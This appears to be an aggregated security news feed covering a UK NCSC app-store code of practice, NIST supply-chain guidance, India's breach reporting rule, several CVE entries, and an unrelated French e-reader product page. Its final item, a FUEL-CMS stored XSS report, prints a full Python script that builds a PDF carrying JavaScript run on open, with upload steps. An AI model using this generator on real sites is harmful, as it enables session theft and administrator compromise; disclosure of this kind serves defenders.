NCSC proposes new code of conduct for app stores

NCSC proposes new code of conduct for app stores

  

A report from the UK government has laid bare the risks of malicious mobile apps, as lawmakers call for tougher protections for consumers.

The report (PDF), published by the UK National Cyber Security Centre (NCSC), found that “people’s data and money are at risk because of fraudulent apps containing malicious malware created by cybercriminals or poorly developed apps which can be compromised by hackers exploiting weaknesses in software”.

The study, which conducted a review into the app store ecosystem from December 2020 to March 2022, detailed how 87% of UK citizens now own a smartphone, conveying a widespread attack surface.

Read more of the latest security news from the UK

“\[M\]alicious and poorly developed apps continue to be accessible to users, therefore it is evident that some developers are not following best practice when creating apps,” the NCSC claims.

“Additionally, prominent app store operators are not adequately signposting app requirements to developers and providing detailed feedback if an app or update is rejected.”

**New rules**

In response to the findings, the government is calling views from the tech industry on enhanced security and privacy requirements for firms running app stores and developers making apps.

Under new proposals, app stores for smartphones, game consoles, TVs and other smart devices could be asked to commit to a new code of practice setting out baseline security and privacy requirements, which the UK says “would be the first such measure in the world”.

RELATED UK government reveals plans to become ‘global cyber power’ in 2022

Developers and store operators making apps available to UK users would be covered including Apple, Google, Amazon, Huawei, Microsoft, and Samsung.

The proposed policy would require stores to have a vulnerability reporting process for each app available. They would also be required to share more security and privacy information in an accessible way, including giving consumers information on matters such as why an app would need access to users’ contacts and location.

NCSC technical director Ian Levy commented: “Our threat report shows there is more for app stores to do, with cybercriminals currently using weaknesses in app stores on all types of connected devices to cause harm.

“I support the proposed code of practice, which demonstrates the UK’s continued intent to fix systemic cybersecurity issues.”

**‘Crucial awareness’**

Filip Verloy, EMEA technical evangelist at Noname Security, commented: “These types of initiatives raise crucial awareness of the security issues that we currently face and provide a healthy and necessary debate on the subject. This should prove useful even if it only accomplishes just that.

“However, there are a few flaws to the measures proposed. Firstly, Apple has already made it a point of differentiation to prioritize privacy and security and perform extensive moderation in their app store versus competitors.

“Secondly, there is no such thing as 100% certainty about security when it comes to software, though laying out best practices and increasing scrutiny will certainly help weed out the worst offenders.”

YOU MAY ALSO LIKE UK government employees receive ‘billions’ of malicious emails per year – report

UK government calls for tougher protections against malicious mobile apps

Amid ongoing software supply-chain jitters, the US' top tech division is offering a finalized, comprehensive cybersecurity control framework for managing risk.

The National Institute of Standards and Technology (NIST) has updated its cybersecurity guidance for addressing software supply-chain risk, offering tailored sets of suggested security controls for various stakeholders.

Software supply-chain attacks rocketed to the top of the enterprise worry list last year as the SolarWinds and Log4Shell incidents sent shockwaves through the IT security community. Security practitioners are increasingly concerned about the safety of open source components and third-party libraries that make up the building blocks of thousands of applications. Another cause of worry is the varied ways platforms can be abused, as in the Kaseya attack last year, when cybercriminals compromised a managed application, or with SolarWinds, where they hacked an update mechanism to deliver malware.

NIST's latest publication (PDF) offers specific risk-management guidance for profiles such as cybersecurity specialists, risk managers, systems engineers, and procurement officials. Each profile matches up with a set of recommended controls, such as implementing secure remote access mechanisms for tapping the software supply chain, or enacting the principle of least privilege, or taking an inventory of all software suppliers and products.

"Managing the cybersecurity of the supply chain is a need that is here to stay," said NIST publication author Jon Boyens, in a Thursday announcement. "If your agency or organization hasn't started on it, this is a comprehensive tool that can take you from crawl to walk to run, and it can help you do so immediately."

The development follows from an Executive Order issued by President Biden last year, which directs government agencies to "improve the security and integrity of the software supply chain, with a priority on addressing critical software."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

NIST Issues Guidance for Addressing Software Supply-Chain Risk

A logic error in the Hints::Hints function of Poppler v22.03.0 allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.

A logic error in Function Hints::Hints (poppler/Hints.cc) is found with fuzzing.

There is a check after the memory alloc and set the nPages to zero if failed:

    if (!nObjects || !pageObjectNum || !xRefOffset || !pageLength || !pageOffset || !numSharedObject || !sharedObjectId) {
    
        error(errSyntaxWarning, -1, "Failed to allocate memory for hints table");
    
        nPages = 0;
    
    }

But at the end of function, there is a direct call to function readTables WITHOUT the check of nPages.

I believe it should be changed to:

    if (nPages != 0) {
    
        readTables(str, linearization, xref, secHdlr);
    
    }

Otherwise, with the attached poc.pdf, program pdftops will hang for a very long time (days), could be a DoS.

pdftops poc.pdf

Edited Mar 15, 2022 by

CVE-2022-27337: Logic error in function Hints::Hints (#1230) · Issues · poppler / poppler · GitLab

Foxit PDF Reader before 12.0.1 and PDF Editor before 12.0.1 allow a this.maildoc NULL pointer dereference.

CVE-2022-27359

CVE-2022-27337: Logic error in function Hints::Hints (#1230) · Issues · poppler / poppler

Foxit PDF Reader v11.2.1.53537 was discovered to contain a NULL pointer dereference via the component FoxitPDFReader.exe. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PHP file.

By Jung soo An, Asheer Malhotra and Justin Thattil, with contributions from Aliza Berk and Kendall McKay.

In February 2022, corresponding roughly with the start of the Russian Invasion of Ukraine, Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Mustang Panda deploys a new wave of malware targeting Europe

Reporting window is 66 hours shorter than that stipulated under the EU’s GDPR

Reporting window is 66 hours shorter than that stipulated under the EU’s GDPR

Organizations in India face a six-hour data breach reporting deadline, following the introduction of new rules by the country’s computer emergency response team, CERT-In.

The new rules will apply to critical parts of India’s network and IT infrastructure, including service providers, data centers, government organizations, and corporations.

The reporting window is much shorter than those in other large economies: in the EU, the GDPR mandates that breaches are reported within 72 hours. Incidents can be reported by phone, fax or email.

Organizations covered by the rule must keep logs for 180 days after an incident.

**Know your customer**

Some sectors, including data centers, cloud service providers, and VPN operators, will also have to register and maintain certain information about customers, including names, IPs, and their reason for using services, for at least five years.

Similarly, cryptocurrency services will be obliged to maintain ‘know your customer’ (KYC) records.

CERT-In has issued a list of 20 types of incident (PDF) that organizations must report within the six-hour window. These include malware and ransomware attacks; identity theft, spoofing and phishing attacks; and data breaches and data leaks.

Read more of the latest cybersecurity news from India

The list also includes unauthorized access to social media accounts and attacks or suspicious activities affecting cloud computing services, the blockchain, robotics, additive manufacturing, 3D printing, or drones.

All organizations covered by the directive must synchronize their systems to network time (NTP) servers maintained by India’s National Informatics Centre or National Physical Laboratory, or NTP servers synched to those systems, presumably to make it easier for CERT-In to analyze log data.

Organizations that fail to comply may face penalties set out under India’s IT Act, 2000.

Announcing the new rules, India’s Ministry of Electronics and IT stated that “CERT-In has identified certain gaps causing hindrance in incident analysis”, adding that the rules would “enhance overall cyber security posture and ensure safe & trusted Internet in the country”.

RV Raghu, director at Versatilist Consulting India and ISACA Ambassador in India, hailed the announcement as “a great step towards improved data and customer protection which can also strengthen the overall cybersecurity posture of Indian enterprises.

“Reporting incidents can lead to the sharing of information, preventing the rise of systemic risks and leading to a stronger ecosystem,” he told The Daily Swig.

The new rules are due to come into force 60 days after their announcement, on April 28.

RELATED India’s Personal Data Privacy Bill: What does it mean for individuals and businesses?

India to introduce six-hour data breach notification rule

Bookeen Notea Firmware BK_R_1.0.5_20210608 is affected by a directory traversal vulnerability that allows an attacker to obtain sensitive information.

**Comme sur le papier**

La saisie au stylet WACOM rapide et sensible à la pression permet de dessiner avec une grande précision. Initialement **mise au point pour les tablettes graphiques professionnelles,** cette technologie ne nécessite ni fil, ni batterie et autorise une écriture souple et précise. L’affichage instantané sur la surface texturée de l’écran à encre électronique Eink offre une expérience d'écriture identique à celle que l'on a sur papier.

*   **Saisie au stylet**
    
    Technologie Wacom avec 4096 niveaux de pression.
    
*   **Effet papier**
    
    Ecran Eink (16 niveaux de gris) lisible en plein soleil avec une résolution 1404\*1872 de 227dpi
    
*   **Grand écran**
    
    Surface d'affichage de 10,3 pouces (26cm) de diagonale équivalent au format A5
    
*   **Eclairage pour usage de nuit**
    
    Luminosité programmable avec option de réglage de la lumière bleue.
    

**Une saisie ultra-précise pour professionnels**

Initialement mise au point pour les graphistes professionnels, la technologie Wacom autorise une saisie très précise sans interférence avec l'appui de la paume sur l'écran. La Notéa est ainsi compatible avec tous les stylets Wacom et peut gérer jusqu'à 4096 niveaux de pression.

**Un nouvel outil dans votre espace de travail**

La Notéa ajoute des fonctions numériques à votre bloc-notes. Le reconnaissance d'écriture, l'annotation de livres et documents, le partage par email ou sur grand écran.

*   **Transcription des notes**
    
    Conversion automatique des notes manuscrites en texte par MyScript© (33 langues)
    
*   **Annotation de documents**
    
    Prise de notes directement sur documents PDF et EPUB
    
*   **Partage par email**
    
    Envoi et réception directs des notes et documents depuis le bloc-notes numérique.
    
*   **Affichage sur grand écran**
    
    Partage d'écran et diffusion sur téléviseur via Miracast
    

**L'expertise de l'écriture numérique**

La Notéa intègre Myscript©, le plus puissant moteur de reconnaissance d'écriture manuscrite. Les notes qu'elles soient écrites en cursives, en majuscules ou en scriptes, sont converties en quelques secondes vers un fichier Txt ou PDF. Ne laissez plus votre contenu manuscrit à l'écart de votre quotidien dans le monde numérique.

**Autonome et mobile**

Avec son poids plume, prenez votre Notéa partout avec vous. Sa batterie de haute capacité (4000 mAh) vous offrira une autonomie d'une semaine sans recharge. La Notéa possède 32Go de stockage interne et peut également se synchroniser avec différents services de Cloud.

*   **1 semaine d'autonomie**
    
    Batterie Lithium Polymer 4000mAh
    
*   **Mémoire**
    
    32 Go de stockage interne et accès aux différentes services de stockage dans le cloud via les apps.
    
*   **Transfert et partage**
    
    Connexion sans-fil Wifi : IEEE 802.11 b/g/n et Bluetooth : BT 4.2 & BLE.
    
*   **USB-C**
    
    Connecteur USB pour recharge, casque audio, connexion PC
    

**Une tablette à part entière**

La Notéa® peut être considérée comme une tablette tactile Android à part entière proposant un accès à un store d'applications. La Notéa est équipée de deux haut-parleurs et d’un micro.

*   **Interface au doigt**
    
    Ecran tactile capacitif sans interférence avec le stylet
    
*   **Audio**
    
    Haut-parleurs ou écouteurs par USB-C ou Bluetooth pour les applications audio
    
*   **Enregistrement**
    
    Microphone intégré pour les apps nécessitant un enregistrement audio et/ou une prise de son
    
*   **Store d'applications**
    
    Compatible avec le système Android 8.. Accès au Playstore pour télécharger des Apps.
    

*   **Mine texturée**
    
    La mine du stylet spécialement conçue pour procurer un touché très proche de celui de l'écriture sur papier.
    
*   **Gomme**
    
    Bouton latéral qui permet au stylet de basculer en mode gomme et d'effacer par trait ou par zone.
    
*   **Ctrl-z**
    
    Rien n'est irréversible sur la Notéa, bouton latéral d'annulation et de reprise des derniers traits réalisés au stylet.
    
*   **Bluetooth**
    
    Appairage Bluetooth avec la Notéa permettant la personnalisation et l'utilisation de trois boutons latéraux. Fonction Bluetooth rechargeable par USB.
    

**Spécifications techniques**

**Dimensions**

Modèle : CYBN10F

Fonction : Bloc-Notes numérique

Dimensions : 191,1 x 232,5 x 8,0 mm

Poids : 460 g

**Logiciel**

Système d'exploitation : Android 8.1

Play Store : Installable

**Ecran**

Taille : 10,3'' (26cm)

Résolution (Pixels) : 1404\*1872

DPI : 227

Niveaux de gris : 16

Ecran capacitif : oui

Wacom (EMR) : Oui

Front Light (FL) : Oui

Filtre lumière bleue : Oui

**Electronique**

CPU : 1.8 GHz Quad-Core

RAM : 2 Go

Stockage : 32 Go

USB 2.0 : Type C

LED de charge : Blanc

Écouteurs : Type C

Micro : Oui

Haut-parleur : Stéréo

Wi-Fi : IEEE 802.11 b/g/n

Bluetooth : BT 4.2

Bluetooth BLE : Oui

Accéléromètre : Oui

Effet Hall : Oui (Couverture intelligente)

Power button : Power on/off

**Batterie et autonomie**

Type : Lithium-Ion Polymer

Capacité : 3,7 V/4000 mAh

Consommation en veille : 2,0 mA

Durée en veille : 60 jours

**Stylet**

Wacom (EMR) : Oui (4096 niveux de pression)

Bluetooth : 3 boutons : mise en veille, haut, bas

Micro-USB : Recharge batterie pour fonction Bluetooth

**Inscription à la Newsletter**

CVE-2021-45783: Bookeen, la lecture numérique

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.  
1、login as admin .in the Assets page  
  
2、Use the following PoC to generate malicious files :

    # FROM https://github.com/osnr/horrifying-pdf-experiments
    import sys
    
    from pdfrw import PdfWriter
    from pdfrw.objects.pdfname import PdfName
    from pdfrw.objects.pdfstring import PdfString
    from pdfrw.objects.pdfdict import PdfDict
    from pdfrw.objects.pdfarray import PdfArray
    
    def make_js_action(js):
        action = PdfDict()
        action.S = PdfName.JavaScript
        action.JS = js
        return action
     
    def make_field(name, x, y, width, height, r, g, b, value=""):
        annot = PdfDict()
        annot.Type = PdfName.Annot
        annot.Subtype = PdfName.Widget
        annot.FT = PdfName.Tx
        annot.Ff = 2
        annot.Rect = PdfArray([x, y, x + width, y + height])
        annot.MaxLen = 160
        annot.T = PdfString.encode(name)
        annot.V = PdfString.encode(value)
     
        # Default appearance stream: can be arbitrary PDF XObject or
        # something. Very general.
        annot.AP = PdfDict()
     
        ap = annot.AP.N = PdfDict()
        ap.Type = PdfName.XObject
        ap.Subtype = PdfName.Form
        ap.FormType = 1
        ap.BBox = PdfArray([0, 0, width, height])
        ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
        ap.stream = """
    %f %f %f rg
    0.0 0.0 %f %f re f
    """ % (r, g, b, width, height)
    
        # It took me a while to figure this out. See PDF spec:
        # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    
        # Basically, the appearance stream we just specified doesn't
        # follow the field rect if it gets changed in JS (at least not in
        # Chrome).
    
        # But this simple MK field here, with border/color
        # characteristics, _does_ follow those movements and resizes, so
        # we can get moving colored rectangles this way.
        annot.MK = PdfDict()
        annot.MK.BG = PdfArray([r, g, b])
    
        return annot
    
    def make_page(fields, script):
        page = PdfDict()
        page.Type = PdfName.Page
    
        page.Resources = PdfDict()
        page.Resources.Font = PdfDict()
        page.Resources.Font.F1 = PdfDict()
        page.Resources.Font.F1.Type = PdfName.Font
        page.Resources.Font.F1.Subtype = PdfName.Type1
        page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    
        page.MediaBox = PdfArray([0, 0, 612, 792])
    
        page.Contents = PdfDict()
        page.Contents.stream = """
    BT
    /F1 24 Tf
    ET
        """
    
        annots = fields
    
        page.AA = PdfDict()
        # You probably should just wrap each JS action with a try/catch,
        # because Chrome does no error reporting or even logging otherwise;
        # you just get a silent failure.
        page.AA.O = make_js_action("""
    try {
      %s
    } catch (e) {
      app.alert(e.message);
    }
        """ % (script))
    
        page.Annots = PdfArray(annots)
        return page
    
    if len(sys.argv) > 1:
        js_file = open(sys.argv[1], 'r')
    
        fields = []
        for line in js_file:
            if not line.startswith('/// '): break
            pieces = line.split()
            params = [pieces[1]] + [float(token) for token in pieces[2:]]
            fields.append(make_field(*params))
    
        js_file.seek(0)
    
        out = PdfWriter()
        out.addpage(make_page(fields, js_file.read()))
        out.write('result.pdf')
    

  
3、back to Assets then we can see xss-cookie.svg have been upload:  
  
4、when user click the xss.pdf it will trigger a XSS attack

Tag

#pdf